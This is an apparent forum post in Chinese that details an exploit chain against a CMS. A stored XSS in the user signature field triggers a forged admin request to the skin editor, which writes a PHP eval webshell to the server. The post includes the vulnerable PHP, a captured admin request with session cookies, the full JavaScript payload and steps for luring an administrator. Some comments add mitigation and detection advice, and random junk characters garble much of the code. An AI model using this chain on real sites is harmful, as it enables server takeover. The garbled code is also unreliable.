这个 CMS 以前有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下了源码。
因为后台登入还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
</textarea></td></tr>
user/do.php
// Profile-update branch (op=zl). The $CS_* values are the submitted form fields; nothing in
// this branch escapes or encodes them before use.
4 J1 L+ `* ^' x/ l, R! i" z, ?6 jif($op=='zl'){ // profile data
+ e5 q {: |% }5 i3 D; `. Q 5 y# q9 V/ e. {% n$ s
// Presence check only. empty() also rejects a legitimate "0"; it is not a sanitizer, and
// CS_Sex and CS_Qianm (the signature) are not checked at all.
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
u \$ \- y- W6 _; g4 ]) M2 T( Y6 G exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
7 V% }5 ]' w7 n. Z6 g 5 [1 X" d$ C7 K0 r& w
// The fields are concatenated straight into the UPDATE: the string fields unescaped inside
// quotes, CS_Sex unquoted. Unless a global filter escapes request input upstream (not visible
// here), this is SQL injection as well as the XSS the post describes. Mitigation: bind
// parameters or use the DB layer's escaping for the string fields and cast CS_Sex to int.
// The WHERE clause identifies the row by $cscms_name, whose origin is outside this snippet;
// it must come from server-side session state, not from a client-supplied value.
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
1 w! B; U. E8 u; ` }" ~" O8 e / P, A6 h3 x9 @- Y: w
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
, I2 h6 V4 W; ~9 G, T where CS_Name='".$cscms_name."'";& D* V* h- j$ q1 Y$ {
+ D, `; T i, D g6 H
// CS_Qianm is stored raw and later echoed without htmlspecialchars() in
// user/member/skin_edit.php (quoted above) — that is the stored XSS; encode at output.
if($db->query($sql)){ `7 g" I( Q3 d
// Success path also goes through Msg_Error(); only the message text differs.
* T8 F6 V1 V4 B exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));' ~& C- p5 M0 O$ g
K2 i9 M- Y, F' m5 R- E+ ~
}else{
+ w. i1 K+ [9 } k" I! p ! p; ?+ t, L+ ~, y! F* [' a4 g) Q
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));7 A8 k! t' e' @( x
- p$ G6 F2 p! }) C+ l; s; F
}) p4 d; P) v+ D$ W$ Y- p- r2 P
没有过滤，导致 XSS 产生。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包：
POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 127.0.0.1
Content-Length: 38
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E
于是构造 JS 如下。
<script>
// Target URL is built from the hostname of the page the signature is rendered on, so the
// payload reaches the admin skin-editor write endpoint (ac=xgmb&op=go) on whatever host the
// viewer is using, with the viewer's own cookies. `thisTHost` is assigned without a
// declaration (implicit global). The endpoint's `path` parameter is taken verbatim from the
// query string; restricting it to the skins directory server-side is part of the fix.
- U( i: K- j& ~' F R9 YthisTHost = top.location.hostname;. j1 _% \0 a# O" I1 d) L: M6 U
8 p7 a2 {1 ~: t1 HthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
" t/ r' l, l6 Y8 G$ \ y - A! L/ [. j( D9 R) w
/**
 * Builds a hidden POST form with two fields and submits it to `url`.
 * The parameter names are misleading: `data` becomes the `name` field and `msg` becomes
 * the `content` field (see the setAttribute("name", ...) calls below).
 *
 * Why this works against the admin endpoint: the form is submitted by the admin's own
 * browser while the signature page is open, so the request carries the admin's cookies,
 * and the captured request above shows no anti-CSRF token is expected. Because the form
 * posts to the same origin, SameSite cookie attributes would not stop it; the controls that
 * do are a per-request CSRF token (or re-authentication) on state-changing admin actions,
 * output encoding of the signature field, and an extension whitelist on `name`.
 * Uses `document.body`, so it only runs once the page body exists.
 *
 * @param {string} url  - action URL the form is posted to
 * @param {string} data - value of the `name` field
 * @param {string} msg  - value of the `content` field
 * @returns {undefined} navigates away on submit
 */
function PostSubmit(url, data, msg) { " p( N2 u) {( b' [
var postUrl = url;
5 P4 v5 E9 B, X6 m' V/ m+ ]5 ?1 _
) W7 i) \! e9 U5 i3 y/ M$ S var postData = data; ( ^, c& y; e3 ?3 D! \1 c6 m
var msgData = msg; / u5 b. n: P9 t' U3 f) A
// Form is attached to the document before its fields are populated; submit() triggers a
// full top-level navigation, which is what a CSRF token check must gate.
var ExportForm = document.createElement("FORM"); , H4 B8 Y! m3 h# R( ?
document.body.appendChild(ExportForm); ' B# b: p0 k9 c
ExportForm.method = "POST"; 7 h2 U' z9 r6 [
var newElement = document.createElement("input"); * c! [5 @1 i5 ?& ~( [/ ^
newElement.setAttribute("name", "name");
3 C6 m) \2 c0 M; h8 ~0 m9 s newElement.setAttribute("type", "hidden");
, s( X4 i, t7 ~6 Z/ R1 \# p var newElement2 = document.createElement("input"); : V& h1 O( A7 s1 X' d
newElement2.setAttribute("name", "content"); , a8 Y1 k- o. B6 J: v# I
newElement2.setAttribute("type", "hidden");
, H3 H+ p4 e4 n7 l9 K ExportForm.appendChild(newElement);
8 ]" A3 W$ N" P7 P7 J8 |3 C ExportForm.appendChild(newElement2);
6 J/ a+ N& f4 X$ } newElement.value = postData; 8 v: @: A1 K! x9 a
newElement2.value = msgData;
! y/ ~! a/ K' G2 H( v" @3 P' e; b ExportForm.action = postUrl; 7 C- h1 ^1 W8 A7 w" D% v
ExportForm.submit(); 7 G" q4 Q: b5 J- p/ k& l* `. f2 ?7 p
};! H6 _0 Y7 V1 z5 Q, W; l2 l
) I. f/ e' q( K& U- _8 ^8 T0 j+ J
// Posts name=roker.php with a PHP one-liner as content. That the server wrote it as-is shows
// the admin file-write endpoint appears to validate neither the `name` extension nor the
// `path` value; a whitelist of allowed extensions and a path restricted to the skins
// directory are the fix. Detection: POSTs to skins.php with ac=xgmb&op=go whose `name`
// ends in .php, or (if a Referer is present) whose Referer points at a user-facing page
// rather than the admin skin editor.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
</script>
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处插入。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改），
就会在 skins\index\html\ 目录下生成 roker.php 一句话。